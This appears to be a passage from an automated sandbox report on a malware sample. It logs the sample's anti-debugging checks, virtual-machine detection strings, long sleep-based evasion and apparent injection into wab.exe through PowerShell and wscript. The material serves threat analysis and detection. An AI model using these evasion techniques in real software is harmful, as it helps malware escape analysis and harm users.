            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB096E rdtsc 25_2_21FB096E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5274Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4625Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6358Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3499Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2719Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3703Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2760Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 968Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 703Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6097Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3643Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6995
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2518
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 571
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.8 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep count: 6358 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7084Thread sleep count: 3499 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4824Thread sleep count: 2719 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640Thread sleep count: 3703 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640Thread sleep time: -11109000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640Thread sleep count: 2760 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640Thread sleep time: -8280000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3528Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep count: 6995 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 2518 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1252Thread sleep count: 571 > 30
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 2719 delay: -5Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_222E10F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E6580 FindFirstFileExA,8_2_222E6580
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418981 memset,GetSystemInfo,16_2_00418981
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WCN\en-GB\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\
            Source: wscript.exe, 0000000D.00000002.2517453779.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: powershell.exe, 00000002.00000002.2710409921.00000214ABD20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
            Source: wab.exe, 00000008.00000003.2493992487.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.0000000006491000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.000000000646C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.0000000006491000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000646D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.0000000006491000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000646C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 0000000D.00000002.2517453779.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: powershell.exe, 0000000E.00000002.3267072681.00000000073D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_19-34118
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebugger
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB096E rdtsc 25_2_21FB096E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_049C8590 LdrInitializeThunk,5_2_049C8590
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_222E2639
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E4AB4 mov eax, dword ptr fs:[00000030h]8_2_222E4AB4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA01F8 mov eax, dword ptr fs:[00000030h]25_2_21FA01F8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F751ED mov eax, dword ptr fs:[00000030h]25_2_21F751ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045227 mov eax, dword ptr fs:[00000030h]25_2_22045227
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAD1D0 mov eax, dword ptr fs:[00000030h]25_2_21FAD1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAD1D0 mov ecx, dword ptr fs:[00000030h]25_2_21FAD1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8B1B0 mov eax, dword ptr fs:[00000030h]25_2_21F8B1B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202B256 mov eax, dword ptr fs:[00000030h]25_2_2202B256
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF019F mov eax, dword ptr fs:[00000030h]25_2_21FF019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A197 mov eax, dword ptr fs:[00000030h]25_2_21F6A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203D26B mov eax, dword ptr fs:[00000030h]25_2_2203D26B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB0185 mov eax, dword ptr fs:[00000030h]25_2_21FB0185
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045283 mov eax, dword ptr fs:[00000030h]25_2_22045283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h]25_2_220062A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220062A0 mov ecx, dword ptr fs:[00000030h]25_2_220062A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220072A0 mov eax, dword ptr fs:[00000030h]25_2_220072A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6C156 mov eax, dword ptr fs:[00000030h]25_2_21F6C156
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F76154 mov eax, dword ptr fs:[00000030h]25_2_21F76154
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F77152 mov eax, dword ptr fs:[00000030h]25_2_21F77152
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69148 mov eax, dword ptr fs:[00000030h]25_2_21F69148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B136 mov eax, dword ptr fs:[00000030h]25_2_21F6B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA0124 mov eax, dword ptr fs:[00000030h]25_2_21FA0124
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220452E2 mov eax, dword ptr fs:[00000030h]25_2_220452E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F2F8 mov eax, dword ptr fs:[00000030h]25_2_2202F2F8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6C0F0 mov eax, dword ptr fs:[00000030h]25_2_21F6C0F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB20F0 mov ecx, dword ptr fs:[00000030h]25_2_21FB20F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A0E3 mov ecx, dword ptr fs:[00000030h]25_2_21F6A0E3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F950E4 mov eax, dword ptr fs:[00000030h]25_2_21F950E4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F950E4 mov ecx, dword ptr fs:[00000030h]25_2_21F950E4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F780E9 mov eax, dword ptr fs:[00000030h]25_2_21F780E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF20DE mov eax, dword ptr fs:[00000030h]25_2_21FF20DE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F990DB mov eax, dword ptr fs:[00000030h]25_2_21F990DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203132D mov eax, dword ptr fs:[00000030h]25_2_2203132D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203132D mov eax, dword ptr fs:[00000030h]25_2_2203132D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045341 mov eax, dword ptr fs:[00000030h]25_2_22045341
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F75096 mov eax, dword ptr fs:[00000030h]25_2_21F75096
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F367 mov eax, dword ptr fs:[00000030h]25_2_2202F367
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA909C mov eax, dword ptr fs:[00000030h]25_2_21FA909C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9D090 mov eax, dword ptr fs:[00000030h]25_2_21F9D090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9D090 mov eax, dword ptr fs:[00000030h]25_2_21F9D090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7208A mov eax, dword ptr fs:[00000030h]25_2_21F7208A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201437C mov eax, dword ptr fs:[00000030h]25_2_2201437C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9C073 mov eax, dword ptr fs:[00000030h]25_2_21F9C073
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2204539D mov eax, dword ptr fs:[00000030h]25_2_2204539D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F72050 mov eax, dword ptr fs:[00000030h]25_2_21F72050
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B052 mov eax, dword ptr fs:[00000030h]25_2_21F9B052
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202C3CD mov eax, dword ptr fs:[00000030h]25_2_2202C3CD
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A020 mov eax, dword ptr fs:[00000030h]25_2_21F6A020
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6C020 mov eax, dword ptr fs:[00000030h]25_2_21F6C020
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h]25_2_21F8E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h]25_2_21F8E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h]25_2_21F8E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h]25_2_21F8E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220453FC mov eax, dword ptr fs:[00000030h]25_2_220453FC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA63FF mov eax, dword ptr fs:[00000030h]25_2_21FA63FF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h]25_2_21F783C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h]25_2_21F783C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h]25_2_21F783C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h]25_2_21F783C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203903E mov eax, dword ptr fs:[00000030h]25_2_2203903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203903E mov eax, dword ptr fs:[00000030h]25_2_2203903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203903E mov eax, dword ptr fs:[00000030h]25_2_2203903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203903E mov eax, dword ptr fs:[00000030h]25_2_2203903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA33A0 mov eax, dword ptr fs:[00000030h]25_2_21FA33A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA33A0 mov eax, dword ptr fs:[00000030h]25_2_21FA33A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F933A5 mov eax, dword ptr fs:[00000030h]25_2_21F933A5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F68397 mov eax, dword ptr fs:[00000030h]25_2_21F68397
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F68397 mov eax, dword ptr fs:[00000030h]25_2_21F68397
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F68397 mov eax, dword ptr fs:[00000030h]25_2_21F68397
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045060 mov eax, dword ptr fs:[00000030h]25_2_22045060
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FC739A mov eax, dword ptr fs:[00000030h]25_2_21FC739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FC739A mov eax, dword ptr fs:[00000030h]25_2_21FC739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9438F mov eax, dword ptr fs:[00000030h]25_2_21F9438F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9438F mov eax, dword ptr fs:[00000030h]25_2_21F9438F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6E388 mov eax, dword ptr fs:[00000030h]25_2_21F6E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6E388 mov eax, dword ptr fs:[00000030h]25_2_21F6E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6E388 mov eax, dword ptr fs:[00000030h]25_2_21F6E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F77370 mov eax, dword ptr fs:[00000030h]25_2_21F77370
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F77370 mov eax, dword ptr fs:[00000030h]25_2_21F77370
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F77370 mov eax, dword ptr fs:[00000030h]25_2_21F77370
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov ecx, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69353 mov eax, dword ptr fs:[00000030h]25_2_21F69353
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69353 mov eax, dword ptr fs:[00000030h]25_2_21F69353
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220360B8 mov eax, dword ptr fs:[00000030h]25_2_220360B8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220360B8 mov ecx, dword ptr fs:[00000030h]25_2_220360B8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F67330 mov eax, dword ptr fs:[00000030h]25_2_21F67330
